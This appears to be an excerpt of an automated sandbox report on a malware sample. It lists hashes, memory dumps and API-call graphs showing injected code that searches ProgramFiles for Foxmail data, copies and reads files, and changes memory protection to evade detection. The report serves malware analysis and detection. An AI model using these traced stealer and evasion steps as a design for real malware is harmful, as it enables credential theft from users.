                                • Opcode Fuzzy Hash: 779ed0be9c66e373c61cfe7f71939526de40e332ac5977b4a6ef132e941e4044
                                • Instruction Fuzzy Hash: BEE039B4609241DFE712CA20C854A52BB71BB82205F1DC19AD419AF1A3C626AC43CB12
                                Memory Dump Source
                                • Source File: 00000006.00000002.2502782368.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_4660000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e383898840b561e49f8d1774ab6539986458a4cf63fce15b301731f1380dda8e
                                • Instruction ID: df20e9ce5c27276fe0ddab4c58a11ebaa5291c4b03c0b8c5bfe2bb9f91b27b59
                                • Opcode Fuzzy Hash: e383898840b561e49f8d1774ab6539986458a4cf63fce15b301731f1380dda8e
                                • Instruction Fuzzy Hash: 12F08C70A0020ACBEB14DBA4C555B6E7BB2EB80304F104828D202AF398DA78AD488B90
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2502782368.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_4660000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: +TJ_$+TJ_$\V9k$\V9k
                                • API String ID: 0-2415809441
                                • Opcode ID: 64e0a2103a0293727f873c78e097a416620661464694f7e45b48a011c9fcc66b
                                • Instruction ID: ae04d2c48462e542dbd0600ff74bde931d4a98fb6a6b9ac5c16741d216682382
                                • Opcode Fuzzy Hash: 64e0a2103a0293727f873c78e097a416620661464694f7e45b48a011c9fcc66b
                                • Instruction Fuzzy Hash: 37716B70E00249DFDB14CFA9E88179EFBF2AF88754F148129E516A7354EB74A842CF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2502782368.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_4660000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: +TJ_$+TJ_$\V9k$\V9k
                                • API String ID: 0-2415809441
                                • Opcode ID: 458d657522ab225d9e138bcf651cd7d7f7199e4b535db7a3c724e0de1868d167
                                • Instruction ID: cd839cfadda7fbda34b82bcdb24a688d71e936275297a4b3ef663b5c552c5f90
                                • Opcode Fuzzy Hash: 458d657522ab225d9e138bcf651cd7d7f7199e4b535db7a3c724e0de1868d167
                                • Instruction Fuzzy Hash: 94714A70E00209DFDB14CFA9D89179EFBF2AF88714F148129E516A7354EB75A842CF91

                                Execution Graph

                                Execution Coverage:2.3%
                                Dynamic/Decrypted Code Coverage:98.2%
                                Signature Coverage:7.3%
                                Total number of Nodes:219
                                Total number of Limit Nodes:5
                                execution_graph 6871 21cb1c5b 6872 21cb1c6b ___scrt_fastfail 6871->6872 6875 21cb12ee 6872->6875 6874 21cb1c87 6876 21cb1324 ___scrt_fastfail 6875->6876 6877 21cb13b7 GetEnvironmentVariableW 6876->6877 6901 21cb10f1 6877->6901 6880 21cb10f1 57 API calls 6881 21cb1465 6880->6881 6882 21cb10f1 57 API calls 6881->6882 6883 21cb1479 6882->6883 6884 21cb10f1 57 API calls 6883->6884 6885 21cb148d 6884->6885 6886 21cb10f1 57 API calls 6885->6886 6887 21cb14a1 6886->6887 6888 21cb10f1 57 API calls 6887->6888 6889 21cb14b5 lstrlenW 6888->6889 6890 21cb14d9 lstrlenW 6889->6890 6891 21cb14d2 6889->6891 6892 21cb10f1 57 API calls 6890->6892 6891->6874 6893 21cb1501 lstrlenW lstrcatW 6892->6893 6894 21cb10f1 57 API calls 6893->6894 6895 21cb1539 lstrlenW lstrcatW 6894->6895 6896 21cb10f1 57 API calls 6895->6896 6897 21cb156b lstrlenW lstrcatW 6896->6897 6898 21cb10f1 57 API calls 6897->6898 6899 21cb159d lstrlenW lstrcatW 6898->6899 6900 21cb10f1 57 API calls 6899->6900 6900->6891 6902 21cb1118 ___scrt_fastfail 6901->6902 6903 21cb1129 lstrlenW 6902->6903 6914 21cb2c40 6903->6914 6905 21cb1148 lstrcatW lstrlenW 6906 21cb1168 lstrlenW 6905->6906 6907 21cb1177 lstrlenW FindFirstFileW 6905->6907 6906->6907 6908 21cb11e1 6907->6908 6909 21cb11a0 6907->6909 6908->6880 6910 21cb11aa 6909->6910 6911 21cb11c7 FindNextFileW 6909->6911 6910->6911 6916 21cb1000 6910->6916 6911->6909 6913 21cb11da FindClose 6911->6913 6913->6908 6915 21cb2c57 6914->6915 6915->6905 6915->6915 6917 21cb1022 ___scrt_fastfail 6916->6917 6918 21cb10af 6917->6918 6919 21cb102f lstrcatW lstrlenW 6917->6919 6922 21cb10b5 lstrlenW 6918->6922 6932 21cb10ad 6918->6932 6920 21cb106b lstrlenW 6919->6920 6921 21cb105a lstrlenW 6919->6921 6933 21cb1e89 lstrlenW 6920->6933 6921->6920 6947 21cb1e16 6922->6947 6925 21cb10ca 6928 21cb1e89 5 API calls 6925->6928 6925->6932 6926 21cb1088 GetFileAttributesW 6927 21cb109c 6926->6927 6926->6932 6927->6932 6939 21cb173a 6927->6939 6929 21cb10df 6928->6929 6952 21cb11ea 6929->6952 6932->6910 6934 21cb2c40 ___scrt_fastfail 6933->6934 6935 21cb1ea7 lstrcatW lstrlenW 6934->6935 6936 21cb1ec2 6935->6936 6937 21cb1ed1 lstrcatW 6935->6937 6936->6937 6938 21cb1ec7 lstrlenW 6936->6938 6937->6926 6938->6937 6940 21cb1747 ___scrt_fastfail 6939->6940 6967 21cb1cca 6940->6967 6943 21cb199f 6943->6932 6945 21cb1824 ___scrt_fastfail _strlen 6945->6943 6987 21cb15da 6945->6987 6948 21cb1e29 6947->6948 6951 21cb1e4c 6947->6951 6949 21cb1e2d lstrlenW 6948->6949 6948->6951 6950 21cb1e3f lstrlenW 6949->6950 6949->6951 6950->6951 6951->6925 6953 21cb120e ___scrt_fastfail 6952->6953 6954 21cb1e89 5 API calls 6953->6954 6955 21cb1220 GetFileAttributesW 6954->6955 6956 21cb1246 6955->6956 6958 21cb1235 6955->6958 6957 21cb1e89 5 API calls 6956->6957 6960 21cb1258 6957->6960 6958->6956 6959 21cb173a 35 API calls 6958->6959 6959->6956 6961 21cb10f1 56 API calls 6960->6961 6962 21cb126d 6961->6962 6963 21cb1e89 5 API calls 6962->6963 6964 21cb127f ___scrt_fastfail 6963->6964 6965 21cb10f1 56 API calls 6964->6965 6966 21cb12e6 6965->6966 6966->6932 6968 21cb1cf1 ___scrt_fastfail 6967->6968 6969 21cb1d0f CopyFileW CreateFileW 6968->6969 6970 21cb1d55 GetFileSize 6969->6970 6971 21cb1d44 DeleteFileW 6969->6971 6972 21cb1ede 22 API calls 6970->6972 6976 21cb1808 6971->6976 6973 21cb1d66 ReadFile 6972->6973 6974 21cb1d7d CloseHandle DeleteFileW 6973->6974 6975 21cb1d94 CloseHandle DeleteFileW 6973->6975 6974->6976 6975->6976 6976->6943 6977 21cb1ede 6976->6977 6979 21cb222f 6977->6979 6980 21cb224e 6979->6980 6983 21cb2250 6979->6983 6995 21cb474f 6979->6995 7000 21cb47e5 6979->7000 6980->6945 6982 21cb2908 6984 21cb35d2 __CxxThrowException@8 RaiseException 6982->6984 6983->6982 7007 21cb35d2 6983->7007 6985 21cb2925 6984->6985 6985->6945 6988 21cb160c _strcat _strlen 6987->6988 6989 21cb163c lstrlenW 6988->6989 7095 21cb1c9d 6989->7095 6991 21cb1655 lstrcatW lstrlenW 6992 21cb1678 6991->6992 6993 21cb167e lstrcatW 6992->6993 6994 21cb1693 ___scrt_fastfail 6992->6994 6993->6994 6994->6945 7010 21cb4793 6995->7010 6998 21cb478f 6998->6979 6999 21cb4765 7016 21cb2ada 6999->7016 7005 21cb56d0 __dosmaperr 7000->7005 7001 21cb570e 7029 21cb6368 7001->7029 7003 21cb56f9 RtlAllocateHeap 7004 21cb570c 7003->7004 7003->7005 7004->6979 7005->7001 7005->7003 7006 21cb474f __dosmaperr 7 API calls 7005->7006 7006->7005 7008 21cb35f2 RaiseException 7007->7008 7008->6982 7011 21cb479f ___DestructExceptionObject 7010->7011 7023 21cb5671 RtlEnterCriticalSection 7011->7023 7013 21cb47aa 7024 21cb47dc 7013->7024 7015 21cb47d1 _abort 7015->6999 7017 21cb2ae3 7016->7017 7018 21cb2ae5 IsProcessorFeaturePresent 7016->7018 7017->6998 7020 21cb2b58 7018->7020 7028 21cb2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7020->7028 7022 21cb2c3b 7022->6998 7023->7013 7027 21cb56b9 RtlLeaveCriticalSection 7024->7027 7026 21cb47e3 7026->7015 7027->7026 7028->7022 7032 21cb5b7a GetLastError 7029->7032 7033 21cb5b99 7032->7033 7034 21cb5b93 7032->7034 7039 21cb5bf0 SetLastError 7033->7039 7058 21cb637b 7033->7058 7051 21cb5e08 7034->7051 7038 21cb5bb3 7065 21cb571e 7038->7065 7040 21cb5bf9 7039->7040 7040->7004 7044 21cb5bb9 7046 21cb5be7 SetLastError 7044->7046 7045 21cb5bcf 7078 21cb593c 7045->7078 7046->7040 7049 21cb571e _free 17 API calls 7050 21cb5be0 7049->7050 7050->7039 7050->7046 7083 21cb5c45 7051->7083 7053 21cb5e2f 7054 21cb5e47 TlsGetValue 7053->7054 7055 21cb5e3b 7053->7055 7054->7055 7056 21cb2ada _ValidateLocalCookies 5 API calls 7055->7056 7057 21cb5e58 7056->7057 7057->7033 7064 21cb6388 __dosmaperr 7058->7064 7059 21cb63c8 7061 21cb6368 __dosmaperr 19 API calls 7059->7061 7060 21cb63b3 RtlAllocateHeap 7062 21cb5bab 7060->7062 7060->7064 7061->7062 7062->7038 7071 21cb5e5e 7062->7071 7063 21cb474f __dosmaperr 7 API calls 7063->7064 7064->7059 7064->7060 7064->7063 7066 21cb5729 HeapFree 7065->7066 7067 21cb5752 __dosmaperr 7065->7067 7066->7067 7068 21cb573e 7066->7068 7067->7044 7069 21cb6368 __dosmaperr 18 API calls 7068->7069 7070 21cb5744 GetLastError 7069->7070 7070->7067 7072 21cb5c45 __dosmaperr 5 API calls 7071->7072 7073 21cb5e85 7072->7073 7074 21cb5ea0 TlsSetValue 7073->7074 7075 21cb5e94 7073->7075 7074->7075 7076 21cb2ada _ValidateLocalCookies 5 API calls 7075->7076 7077 21cb5bc8 7076->7077 7077->7038 7077->7045 7089 21cb5914 7078->7089 7084 21cb5c71 7083->7084 7085 21cb5c75 __crt_fast_encode_pointer 7083->7085 7084->7085 7086 21cb5ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 7084->7086 7088 21cb5c95 7084->7088 7085->7053 7086->7084 7087 21cb5ca1 GetProcAddress 7087->7085 7088->7085 7088->7087 7090 21cb5854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 7089->7090 7091 21cb5938 7090->7091 7092 21cb58c4 7091->7092 7093 21cb5758 __dosmaperr 20 API calls 7092->7093 7094 21cb58e8 7093->7094 7094->7049 7096 21cb1ca6 _strlen 7095->7096 7096->6991 7097 50a635e 7100 50a6396 7097->7100 7098 50a63c1 NtProtectVirtualMemory 7098->7100 7099 50a63b5 Sleep 7099->7097 7100->7097 7100->7098 7100->7099 7101 21cbc7a7 7102 21cbc7be 7101->7102 7111 21cbc82c 7101->7111 7102->7111 7113 21cbc7e6 GetModuleHandleA 7102->7113 7104 21cbc872 7105 21cbc835 GetModuleHandleA 7106 21cbc83f 7105->7106 7106->7106 7108 21cbc85f GetProcAddress 7106->7108 7106->7111 7107 21cbc7dd 7107->7106 7109 21cbc800 GetProcAddress 7107->7109 7107->7111 7108->7111 7110 21cbc80d VirtualProtect 7109->7110 7109->7111 7110->7111 7112 21cbc81c VirtualProtect 7110->7112 7111->7104 7111->7105 7111->7106 7112->7111 7114 21cbc7ef 7113->7114 7120 21cbc82c 7113->7120 7125 21cbc803 GetProcAddress 7114->7125 7116 21cbc872 7117 21cbc835 GetModuleHandleA 7123 21cbc83f 7117->7123 7118 21cbc7f4 7119 21cbc800 GetProcAddress 7118->7119 7118->7120 7119->7120 7121 21cbc80d VirtualProtect 7119->7121 7120->7116 7120->7117 7120->7123 7121->7120 7122 21cbc81c VirtualProtect 7121->7122 7122->7120 7123->7120 7124 21cbc85f GetProcAddress 7123->7124 7124->7120 7126 21cbc82c 7125->7126 7127 21cbc80d VirtualProtect 7125->7127 7129 21cbc872 7126->7129 7130 21cbc835 GetModuleHandleA 7126->7130 7127->7126 7128 21cbc81c VirtualProtect 7127->7128 7128->7126 7132 21cbc83f 7130->7132 7131 21cbc85f GetProcAddress 7131->7132 7132->7126 7132->7131

                                Control-flow Graph

                                APIs
                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21CB1137
                                • lstrcatW.KERNEL32(?,?), ref: 21CB1151
                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21CB115C
                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21CB116D
                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21CB117C
                                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21CB1193
                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 21CB11D0
                                • FindClose.KERNEL32(00000000), ref: 21CB11DB
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                • String ID:
                                • API String ID: 1083526818-0
                                • Opcode ID: bfff8f8e6e575ec695ef272e4fd8bda8d49e69e1831fc26d8bddf9ee80969126
                                • Instruction ID: cae9508f1dc7610b48ce0f4b745f083b50a9ec705fc0581b3dcca13be2805273
                                • Opcode Fuzzy Hash: bfff8f8e6e575ec695ef272e4fd8bda8d49e69e1831fc26d8bddf9ee80969126
                                • Instruction Fuzzy Hash: C821A276544309ABD724EBA4AC4CF9B7BDCEF84354F00092AFA69D3190EB35D7048796

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 127 50a635e-50a638b 128 50a6391-50a63a2 call 50a5d75 127->128 130 50a63a9-50a63b3 128->130 131 50a63a4 128->131 132 50a63c1-50a6411 NtProtectVirtualMemory call 50a5d75 130->132 133 50a63b5-50a63bf Sleep 130->133 131->130 135 50a6416-50a6426 132->135 133->127 135->127
                                APIs
                                • Sleep.KERNELBASE(00000005), ref: 050A63B7
                                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 050A640B
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3408936789.000000000486F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0486F000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_486f000_wab.jbxd
                                Yara matches
                                Similarity
                                • API ID: MemoryProtectSleepVirtual
                                • String ID:
                                • API String ID: 3235210055-0
                                • Opcode ID: 1244ec8c65b153eacd16e49a668e67c96e735789e9d8493ff04901c5278d6264
                                • Instruction ID: 6b785065b55cc1521353c072c2ed6b7b3df8a03820c859397ea5f9f51fb4dc1d
                                • Opcode Fuzzy Hash: 1244ec8c65b153eacd16e49a668e67c96e735789e9d8493ff04901c5278d6264
                                • Instruction Fuzzy Hash: 5E113DB29403416FEB506E74DD8DBD977E0FF243A4F4A8184DD91DB0A5D779C8818B41

                                Control-flow Graph

                                APIs
                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21CB1434
                                  • Part of subcall function 21CB10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21CB1137
                                  • Part of subcall function 21CB10F1: lstrcatW.KERNEL32(?,?), ref: 21CB1151
                                  • Part of subcall function 21CB10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21CB115C
                                  • Part of subcall function 21CB10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21CB116D
                                  • Part of subcall function 21CB10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21CB117C
                                  • Part of subcall function 21CB10F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21CB1193
                                  • Part of subcall function 21CB10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 21CB11D0
                                  • Part of subcall function 21CB10F1: FindClose.KERNEL32(00000000), ref: 21CB11DB
                                • lstrlenW.KERNEL32(?), ref: 21CB14C5
                                • lstrlenW.KERNEL32(?), ref: 21CB14E0
                                • lstrlenW.KERNEL32(?,?), ref: 21CB150F
                                • lstrcatW.KERNEL32(00000000), ref: 21CB1521
                                • lstrlenW.KERNEL32(?,?), ref: 21CB1547
                                • lstrcatW.KERNEL32(00000000), ref: 21CB1553
                                • lstrlenW.KERNEL32(?,?), ref: 21CB1579
                                • lstrcatW.KERNEL32(00000000), ref: 21CB1585
                                • lstrlenW.KERNEL32(?,?), ref: 21CB15AB
                                • lstrcatW.KERNEL32(00000000), ref: 21CB15B7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                • String ID: )$Foxmail$ProgramFiles
                                • API String ID: 672098462-2938083778
                                • Opcode ID: b32a1f9e33059699f4dbd47db729b57c5580f008335dd1d7de77e90494240990
                                • Instruction ID: cbdcd80ad5824bb8ed19e5572a45eaf751035ca306d38d46386a9a9bcc3eeeb8
                                • Opcode Fuzzy Hash: b32a1f9e33059699f4dbd47db729b57c5580f008335dd1d7de77e90494240990
                                • Instruction Fuzzy Hash: 2681A179A40359E9DB20DBA1EC85FEE7379EF84700F000596F508E7290EA715B85CF95

                                Control-flow Graph

                                APIs
                                • GetModuleHandleA.KERNEL32(21CBC7DD), ref: 21CBC7E6
                                • GetModuleHandleA.KERNEL32(?,21CBC7DD), ref: 21CBC838
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 21CBC860
                                  • Part of subcall function 21CBC803: GetProcAddress.KERNEL32(00000000,21CBC7F4), ref: 21CBC804
                                  • Part of subcall function 21CBC803: VirtualProtect.KERNELBASE(?,00000078,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC816
                                  • Part of subcall function 21CBC803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC82A
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcProtectVirtual
                                • String ID:
                                • API String ID: 2099061454-0
                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                • Instruction ID: b477053cce76e20fc6257e8ec20e3e795352d60a11660ad15107a00707ca3576
                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                • Instruction Fuzzy Hash: 9F01D21894524AFCBB115674CC01AAA6FDC9B27670B10276AE250CB193D9A38707C3EE

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 79 21cbc7a7-21cbc7bc 80 21cbc7be-21cbc7c6 79->80 81 21cbc82d 79->81 80->81 82 21cbc7c8-21cbc7f6 call 21cbc7e6 80->82 83 21cbc82f-21cbc833 81->83 90 21cbc7f8 82->90 91 21cbc86c-21cbc86e 82->91 85 21cbc872 call 21cbc877 83->85 86 21cbc835-21cbc83d GetModuleHandleA 83->86 88 21cbc83f-21cbc847 86->88 88->88 92 21cbc849-21cbc84c 88->92 93 21cbc85b-21cbc85e 90->93 94 21cbc7fa-21cbc7fe 90->94 96 21cbc870 91->96 97 21cbc866-21cbc86b 91->97 92->83 95 21cbc84e-21cbc850 92->95 101 21cbc85f-21cbc860 GetProcAddress 93->101 102 21cbc800-21cbc80b GetProcAddress 94->102 103 21cbc865 94->103 99 21cbc852-21cbc854 95->99 100 21cbc856-21cbc85a 95->100 96->92 97->91 99->101 100->93 101->103 102->81 104 21cbc80d-21cbc81a VirtualProtect 102->104 103->97 105 21cbc82c 104->105 106 21cbc81c-21cbc82a VirtualProtect 104->106 105->81 106->105
                                APIs
                                • GetModuleHandleA.KERNEL32(?,21CBC7DD), ref: 21CBC838
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 21CBC860
                                  • Part of subcall function 21CBC7E6: GetModuleHandleA.KERNEL32(21CBC7DD), ref: 21CBC7E6
                                  • Part of subcall function 21CBC7E6: GetProcAddress.KERNEL32(00000000,21CBC7F4), ref: 21CBC804
                                  • Part of subcall function 21CBC7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC816
                                  • Part of subcall function 21CBC7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC82A
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcProtectVirtual
                                • String ID:
                                • API String ID: 2099061454-0
                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                • Instruction ID: 8e0049d8791bbcfbf3393c143135cc5e2355c36e2eac7f9f050ba9bd03e3a680
                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                • Instruction Fuzzy Hash: E0210B6944828AEFF7128774CC04BA67FD99B17370F19069AD140CB143D5AA8B47C3EE

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 107 21cbc803-21cbc80b GetProcAddress 108 21cbc82d 107->108 109 21cbc80d-21cbc81a VirtualProtect 107->109 112 21cbc82f-21cbc833 108->112 110 21cbc82c 109->110 111 21cbc81c-21cbc82a VirtualProtect 109->111 110->108 111->110 113 21cbc872 call 21cbc877 112->113 114 21cbc835-21cbc83d GetModuleHandleA 112->114 115 21cbc83f-21cbc847 114->115 115->115 117 21cbc849-21cbc84c 115->117 117->112 118 21cbc84e-21cbc850 117->118 119 21cbc852-21cbc854 118->119 120 21cbc856-21cbc85e 118->120 121 21cbc85f-21cbc865 GetProcAddress 119->121 120->121 124 21cbc866-21cbc86e 121->124 126 21cbc870 124->126 126->117
                                APIs
                                • GetProcAddress.KERNEL32(00000000,21CBC7F4), ref: 21CBC804
                                • VirtualProtect.KERNELBASE(?,00000078,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC816
                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,21CBC7F4,21CBC7DD), ref: 21CBC82A
                                • GetModuleHandleA.KERNEL32(?,21CBC7DD), ref: 21CBC838
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 21CBC860
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: AddressProcProtectVirtual$HandleModule
                                • String ID:
                                • API String ID: 2152742572-0
                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                • Instruction ID: f3cf2e633b5b3336b0c22552c29ac0cc8d39c40c8e4c14ce6fd1d0fa24a6b6ab
                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                • Instruction Fuzzy Hash: 01F0C249545249FCFA1246B4CC41EB66FCC8B67670B101A5AE250CB183D8978B0783FE
                                APIs
                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 21CB61DA
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 21CB61E4
                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 21CB61F1
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: 27f500169df6425da9b4e736e7297dbfac6d6fe277d9ded82858710b7f17dc75
                                • Instruction ID: 7417e83fddae308d48d36771280996c5ce8eb077d50b95122cd20db2d4988c88
                                • Opcode Fuzzy Hash: 27f500169df6425da9b4e736e7297dbfac6d6fe277d9ded82858710b7f17dc75
                                • Instruction Fuzzy Hash: 3A31D27894122DDBDB21DF64D988B9DBBB8EF18310F5041EAE81CA7260E7349F818F45
                                APIs
                                • GetCurrentProcess.KERNEL32(?,?,21CB4A8A,?,21CC2238,0000000C,21CB4BBD,00000000,00000000,00000001,21CB2082,21CC2108,0000000C,21CB1F3A,?), ref: 21CB4AD5
                                • TerminateProcess.KERNEL32(00000000,?,21CB4A8A,?,21CC2238,0000000C,21CB4BBD,00000000,00000000,00000001,21CB2082,21CC2108,0000000C,21CB1F3A,?), ref: 21CB4ADC
                                • ExitProcess.KERNEL32 ref: 21CB4AEE
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: 78875ccef41d13e0bbd30cdc91a902f0ec84b16fd313538f6f6def867e4f3584
                                • Instruction ID: bc17d03e52c1404f4d06e8826b454c329ddccac2f07214ee842078a2d3abd568
                                • Opcode Fuzzy Hash: 78875ccef41d13e0bbd30cdc91a902f0ec84b16fd313538f6f6def867e4f3584
                                • Instruction Fuzzy Hash: A8E0123A044209EFCB066F24D908A593B2AEB25385B104014FA06CA021CB3ADA42CB84
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                • Opcode ID: bd1cd8ee8225a3ff3634a39525aae2a9e7b43bc3e69347b773f6761d96e38ad8
                                • Instruction ID: c561fce355400876bf8ebb464fb2a4f2c25de32e7ac4071b2732ed036790b633
                                • Opcode Fuzzy Hash: bd1cd8ee8225a3ff3634a39525aae2a9e7b43bc3e69347b773f6761d96e38ad8
                                • Instruction Fuzzy Hash: 78310A79900129EFDB159F78CC84EEB7BBDDB46304F1001ACE959D7251E6319F458BA0
                                APIs
                                Memory Dump Source
